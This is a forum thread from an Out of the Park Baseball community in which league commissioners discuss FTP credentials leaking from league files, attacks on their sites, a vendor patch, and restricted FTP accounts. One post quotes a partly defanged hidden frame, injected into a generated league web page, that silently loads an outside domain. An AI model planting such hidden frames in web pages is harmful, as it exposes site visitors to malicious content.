|
|||||||
| Earlier versions of OOTP: Commissioner's Corner Want to run an online league? Want to learn about the 'ins' and 'outs' of being a commish? This is the place! |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#101 (permalink) | |
|
Global Moderator
|
Quote:
I did a search on your posts as you said you ran a 2008 league and I found your website, downloaded your file and was able to get into your ftp site with no difficulties, so yes the problem does exist in 2007/OOTP8. Now, I've no idea how this can be solved in terms of the executable, but what I would say is change your FTP password, and remove the link on your website to the league file. That way there's no way for anybody who isn't a GM in your league to get access to those details. |
|
|
|
|
|
|
#102 (permalink) |
|
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 6,468
Thanked 1,088x in 415 posts
|
We'll release a patch next week which will address the issue. More info here:
http://www.ootpdevelopments.com/boar...y-problem.html
__________________
Andreas Raht andreas@ootpdevelopments.com Out of the Park Developments Out of the Park Baseball Development Team Title Bout Development Team |
|
|
|
|
|
#103 (permalink) | |
|
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 6,468
Thanked 1,088x in 415 posts
|
Quote:
__________________
Andreas Raht andreas@ootpdevelopments.com Out of the Park Developments Out of the Park Baseball Development Team Title Bout Development Team |
|
|
|
|
|
|
#104 (permalink) |
|
Moderator
Join Date: Mar 2002
Location: Mass.
Posts: 1,963
Thanked 136x in 94 posts
|
I think that people who assume the patch will magically fix their security issue will be let down a bit. What it sounds like the patch will be doing is fixing the hole where the login information/password is viewable within the league dat file in clear text if you look for it. I assume that the patch will be using some form of encryption within the league file so it is not viewable for someone who downloads the file. With the type of encryption that I would assume they would use here, keep in mind that many forms of encryption can still be broken by someone who really wants to do so.
Even without looking through the league file however, it is still extremely trivial getting a ftp account name and password if someone who has ootp9 downloads the file due to how the FTP protocol works. Any person with fairly basic understanding of ftp packets on a network wire could probably still get it, and this is something that can not be patched. It would require a completely different protocol (SFTP for instance) to fix this issue. Ideally to protect yourself against this type of thing, you could make sure absolutely no one had your league file except for your trusted owners in the league. That is fairly impractical though for most leagues I assume. To protect yourself, you should create an FTP user account on your ftp server that -only- has access to the import-export folder on the ftp server which contains the team files and the league file and nothing else. Use that account in your ootp league file and it would limit any exposure to the rest of your site. The problem this causes however would be extra complications in updating league html files which would have to either be done manually, or by manually changing the account username/password for the report uploads each time before doing it. Anyhows, just wanted to make sure it was known that as long as FTP is used, someone competent enough to know how to write a virus/trojan would likely know how to exploit FTP to still get the same information even if it is encrypted within the league file. |
|
|
|
|
|
#106 (permalink) |
|
All Star Reserve
Join Date: Feb 2007
Posts: 891
Thanked 7x in 7 posts
|
All I want is to make it as hard as possible to gain access to my website. I've implemented the other recommendations, such as an exclusive FTP account, removing the league file links from my website, etc... Fixing this hole will be just another step that makes it harder to hack my site.
I'm sure most of you would agree that if you make it hard enough, the hacker will move on to find another site. After all, if they wanted to WORK, they'd have jobs.
|
|
|
|
|
|
#107 (permalink) |
|
Administrator
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 6,468
Thanked 1,088x in 415 posts
|
+1
![]() Well, probably hacking OOTP leagues IS their job
__________________
Andreas Raht andreas@ootpdevelopments.com Out of the Park Developments Out of the Park Baseball Development Team Title Bout Development Team |
|
|
|
|
|
#109 (permalink) |
|
All Star Reserve
Join Date: Jul 2002
Location: Reading PA
Posts: 622
Thanked 4x in 4 posts
|
I want to say thank you to all of you have put your heads together and worked to find the problem. The OOTP community is very lucky to have people that are willing to work together when problems arise and save those of us who don't have a clue when it comes to this stuff.
Also I want to give props to Fidel and All Sim Baseball. Fidel has been great in restoring my site very quickly after the attacks happened. Thank you all for your hard work and dedication.
__________________
Commish and Phillies GM of the MHBL http://mixedhistorybaseball.com/ Now Defunct Arcanum league - Phillies 1934 World Series Champs Real Estate Needs www.randysellsyourhome.com |
|
|
|
|
|
#110 (permalink) |
|
Hall Of Famer
Join Date: Nov 2004
Posts: 5,718
Thanked 140x in 68 posts
|
I just found this in an OOTP 6 online league I host...
Code:
<html>
<head>
<title>OOTP 6 Generated Website</title>
</head>
<frameset rows="100,*" frameborder="0" framespacing="0" border="0">
<frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">
<frameset cols="100,*">
<frame name="menu" target="Hauptframe" src="menu.html">
<frame name="content" src="league.html">
</frameset>
<noframes>
<body><(SPACE HERE) ****** src="http://butx.biz/" style="width: 0px; height: 0px; display: none"><(SPACE HERE) /******>
<p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht
unterst・zt.</p>
</body>
</noframes>
</frameset>
</html>
__________________
Fidel Montoya Asahi2 Baseball Commissioner(Historical League Since 2004) www.allsimbaseball.com (OOTP web hosting - Customized sites for online leagues - Sign up, Connect OOTP and Play!) Share Your Mods - Free, unlimited and easy to upload to share your Mods instantly(free site registration required) |
|
|
|
|
|
#114 (permalink) | |
|
Global Moderator
Join Date: Nov 2002
Location: Vancouver
Posts: 7,527
Thanked 303x in 166 posts
|
Quote:
__________________
Useful Links: Manuals | Downloads | Newsletters | Knowledge Base | New Tech Support | Updated Forum Rules Interactive Online League Directory - find or advertise a league today! Canadian Baseball League - uses OOTP11, running steadily since April 2002 |
|
|
|
|
|
|
#115 (permalink) | |
|
Moderator
Join Date: Mar 2002
Location: Mass.
Posts: 1,963
Thanked 136x in 94 posts
|
Quote:
The problem with this is you would be unable to upload web reports as those go in other folders on your server and usually ones which obviously have http enabled for. So opening up the ftp account which the league file uses to be able to upload web reports also gives any potential hacker the access or ability to at least hit part of the website as well. Two ways around this that I can think of: 1) Manually run the web reports from within OOTP and then manually upload them to your server outside of the game using an account that has permission to do so. This requires you to know the directory structure that the web reports get uploaded within. 2) Have two accounts for your league, one the general league upload/download ftp account that is normally in the game and a second account used only for web reports. When you run the league file, get exports, imports etc you use the first account. Then when time to upload web reports switch the settings within the game to the second account/password on your system only to upload the web reports from within the game to the server. Once done make sure you change it back or you will not be able to import owner exports for the next sim. |
|
|
|
|
|
|
#117 (permalink) |
|
Global Moderator
Join Date: Nov 2002
Location: Vancouver
Posts: 7,527
Thanked 303x in 166 posts
|
Have any other leagues experienced problems connecting since switching to 9.2.7? The CBL has and my guess is it may be 9.2.7 because I can connect no problem using the same account info in an ftp client. Then again, at least one person in the league has said they were able to connect through the game using 9.2.7 so why some can and some cannot I have no idea.
__________________
Useful Links: Manuals | Downloads | Newsletters | Knowledge Base | New Tech Support | Updated Forum Rules Interactive Online League Directory - find or advertise a league today! Canadian Baseball League - uses OOTP11, running steadily since April 2002 |
|
|
|
|
|
#118 (permalink) | |
|
All Star Starter
Join Date: Aug 2007
Posts: 1,906
Thanked 382x in 203 posts
|
Quote:
__________________
Commissioner of the Planetary Extreme Baseball Alliance (PEBA) and the League of the Rising Sun (LRS) Premiere OOTP fictional leagues where creativity counts and imagination is your only limitation Check for openings - contact us today! |
|
|
|
|
|
|
#119 (permalink) |
|
Global Moderator
Join Date: Nov 2002
Location: Vancouver
Posts: 7,527
Thanked 303x in 166 posts
|
Thanks, Corsairs. I hope they test 9.2.9 extra well then because as it is now I don't think we can proceed until it's released and working correctly.
__________________
Useful Links: Manuals | Downloads | Newsletters | Knowledge Base | New Tech Support | Updated Forum Rules Interactive Online League Directory - find or advertise a league today! Canadian Baseball League - uses OOTP11, running steadily since April 2002 |
|
|
|
|
|
#120 (permalink) |
|
Hall Of Famer
|
I've had a few owners with connection problems but I've talked them through every one of them so far. After about 3-4 hours, our league is running good with almost no problems *knock on wood*.
Make sure they check if they have 9.2.7 because some people don't know that you have to replace the .exe file. Some think you just download it and you're good. Make sure if you changed the password, league file name that they are opening the right file. I had a couple owners who were still trying to open the file with our old name instead of the new one.
__________________
From the wise mind of Davey Eckstein[/SIZE] "Now all you need is a signature. A quote or initial, perhaps." |
|
|
|
![]() |
| Bookmarks |
| Thread Tools | |
| Display Modes | |
|
|